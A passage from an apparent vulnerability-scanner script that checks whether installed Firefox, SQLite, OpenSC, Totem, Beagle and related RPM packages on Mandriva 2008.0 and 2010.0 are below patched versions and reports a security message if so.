isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lemon\", rpm:\"lemon~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopensc2\", rpm:\"libopensc2~0.11.3~2.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopensc-devel\", rpm:\"libopensc-devel~0.11.3~2.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3_0\", rpm:\"libsqlite3_0~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-devel\", rpm:\"libsqlite3-devel~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-static-devel\", rpm:\"libsqlite3-static-devel~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtotem-plparser7\", rpm:\"libtotem-plparser7~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libtotem-plparser-devel\", rpm:\"libtotem-plparser-devel~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner1.9.2.3\", rpm:\"libxulrunner1.9.2.3~1.9.2.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner-devel\", rpm:\"libxulrunner-devel~1.9.2.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-plugin-opensc\", rpm:\"mozilla-plugin-opensc~0.11.3~2.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"opensc\", rpm:\"opensc~0.11.3~2.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3-tools\", rpm:\"sqlite3-tools~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"tcl-sqlite3\", rpm:\"tcl-sqlite3~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"totem\", rpm:\"totem~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"totem-common\", rpm:\"totem-common~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"totem-gstreamer\", rpm:\"totem-gstreamer~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"totem-mozilla\", rpm:\"totem-mozilla~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"totem-mozilla-gstreamer\", rpm:\"totem-mozilla-gstreamer~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"xulrunner\", rpm:\"xulrunner~1.9.2.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"yelp\", rpm:\"yelp~2.22.1~0.6mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-l10n\", rpm:\"firefox-l10n~3.6.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"sqlite3\", rpm:\"sqlite3~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opensc2\", rpm:\"lib64opensc2~0.11.3~2.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64opensc-devel\", rpm:\"lib64opensc-devel~0.11.3~2.3mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3_0\", rpm:\"lib64sqlite3_0~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-devel\", rpm:\"lib64sqlite3-devel~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64sqlite3-static-devel\", rpm:\"lib64sqlite3-static-devel~3.6.23.1~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64totem-plparser7\", rpm:\"lib64totem-plparser7~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64totem-plparser-devel\", rpm:\"lib64totem-plparser-devel~2.20.1~1.15mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner1.9.2.3\", rpm:\"lib64xulrunner1.9.2.3~1.9.2.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lib64xulrunner-devel\", rpm:\"lib64xulrunner-devel~1.9.2.3~0.1mdv2008.0\", rls:\"MNDK_2008.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if (__pkg_match) exit(99); # Not vulnerable.\n exit(0);\n}\n\n\nif(release == \"MNDK_2010.0\")\n{\n\n if ((res = isrpmvuln(pkg:\"beagle\", rpm:\"beagle~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-crawl-system\", rpm:\"beagle-crawl-system~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-doc\", rpm:\"beagle-doc~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-evolution\", rpm:\"beagle-evolution~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-gui\", rpm:\"beagle-gui~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-gui-qt\", rpm:\"beagle-gui-qt~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"beagle-libs\", rpm:\"beagle-libs~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox\", rpm:\"firefox~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-af\", rpm:\"firefox-af~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ar\", rpm:\"firefox-ar~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-be\", rpm:\"firefox-be~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bg\", rpm:\"firefox-bg~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-bn\", rpm:\"firefox-bn~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ca\", rpm:\"firefox-ca~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cs\", rpm:\"firefox-cs~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-cy\", rpm:\"firefox-cy~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-da\", rpm:\"firefox-da~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-de\", rpm:\"firefox-de~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-devel\", rpm:\"firefox-devel~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-el\", rpm:\"firefox-el~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-en_GB\", rpm:\"firefox-en_GB~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eo\", rpm:\"firefox-eo~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_AR\", rpm:\"firefox-es_AR~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-es_ES\", rpm:\"firefox-es_ES~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-et\", rpm:\"firefox-et~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-eu\", rpm:\"firefox-eu~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-beagle\", rpm:\"firefox-ext-beagle~0.3.9~20.7mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-blogrovr\", rpm:\"firefox-ext-blogrovr~1.1.804~6.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-mozvoikko\", rpm:\"firefox-ext-mozvoikko~1.0~6.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-plasmanotify\", rpm:\"firefox-ext-plasmanotify~0.3.0~6.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-r-kiosk\", rpm:\"firefox-ext-r-kiosk~0.7.2~9.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-scribefire\", rpm:\"firefox-ext-scribefire~3.4.5~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ext-xmarks\", rpm:\"firefox-ext-xmarks~3.3.3~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fi\", rpm:\"firefox-fi~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fr\", rpm:\"firefox-fr~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-fy\", rpm:\"firefox-fy~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ga_IE\", rpm:\"firefox-ga_IE~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gl\", rpm:\"firefox-gl~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-gu_IN\", rpm:\"firefox-gu_IN~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-he\", rpm:\"firefox-he~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hi\", rpm:\"firefox-hi~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-hu\", rpm:\"firefox-hu~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-id\", rpm:\"firefox-id~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-is\", rpm:\"firefox-is~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-it\", rpm:\"firefox-it~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ja\", rpm:\"firefox-ja~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-kn\", rpm:\"firefox-kn~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ko\", rpm:\"firefox-ko~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lt\", rpm:\"firefox-lt~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-lv\", rpm:\"firefox-lv~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mk\", rpm:\"firefox-mk~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-mr\", rpm:\"firefox-mr~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nb_NO\", rpm:\"firefox-nb_NO~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nl\", rpm:\"firefox-nl~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-nn_NO\", rpm:\"firefox-nn_NO~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pa_IN\", rpm:\"firefox-pa_IN~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pl\", rpm:\"firefox-pl~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_BR\", rpm:\"firefox-pt_BR~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-pt_PT\", rpm:\"firefox-pt_PT~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ro\", rpm:\"firefox-ro~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-ru\", rpm:\"firefox-ru~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-si\", rpm:\"firefox-si~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sk\", rpm:\"firefox-sk~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sl\", rpm:\"firefox-sl~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sq\", rpm:\"firefox-sq~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-sv_SE\", rpm:\"firefox-sv_SE~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-te\", rpm:\"firefox-te~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-th\", rpm:\"firefox-th~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-theme-kfirefox\", rpm:\"firefox-theme-kfirefox~0.16~7.5mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-tr\", rpm:\"firefox-tr~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-uk\", rpm:\"firefox-uk~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_CN\", rpm:\"firefox-zh_CN~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"firefox-zh_TW\", rpm:\"firefox-zh_TW~3.6.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-extras\", rpm:\"gnome-python-extras~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda\", rpm:\"gnome-python-gda~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gda-devel\", rpm:\"gnome-python-gda-devel~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gdl\", rpm:\"gnome-python-gdl~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkhtml2\", rpm:\"gnome-python-gtkhtml2~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkmozembed\", rpm:\"gnome-python-gtkmozembed~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"gnome-python-gtkspell\", rpm:\"gnome-python-gtkspell~2.25.3~10.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-common\", rpm:\"google-gadgets-common~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-gtk\", rpm:\"google-gadgets-gtk~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"google-gadgets-qt\", rpm:\"google-gadgets-qt~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"lemon\", rpm:\"lemon~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget1.0_0\", rpm:\"libggadget1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-dbus1.0_0\", rpm:\"libggadget-dbus1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-gtk1.0_0\", rpm:\"libggadget-gtk1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-js1.0_0\", rpm:\"libggadget-js1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-npapi1.0_0\", rpm:\"libggadget-npapi1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-qt1.0_0\", rpm:\"libggadget-qt1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-webkitjs0\", rpm:\"libggadget-webkitjs0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libggadget-xdg1.0_0\", rpm:\"libggadget-xdg1.0_0~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libgoogle-gadgets-devel\", rpm:\"libgoogle-gadgets-devel~0.11.2~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopensc2\", rpm:\"libopensc2~0.11.9~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libopensc-devel\", rpm:\"libopensc-devel~0.11.9~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3_0\", rpm:\"libsqlite3_0~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-devel\", rpm:\"libsqlite3-devel~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libsqlite3-static-devel\", rpm:\"libsqlite3-static-devel~3.6.23.1~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner1.9.2.3\", rpm:\"libxulrunner1.9.2.3~1.9.2.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"libxulrunner-devel\", rpm:\"libxulrunner-devel~1.9.2.3~0.1mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = isrpmvuln(pkg:\"mozilla-plugin-opensc\", rpm:\"mozilla-plugin-opensc~0.11.9~1.6mdv2010.0\", rls:\"MNDK_2010.0\")) != NULL)\n {\n security_message(data:res);\n exit(0);\n }\n\n if ((res = 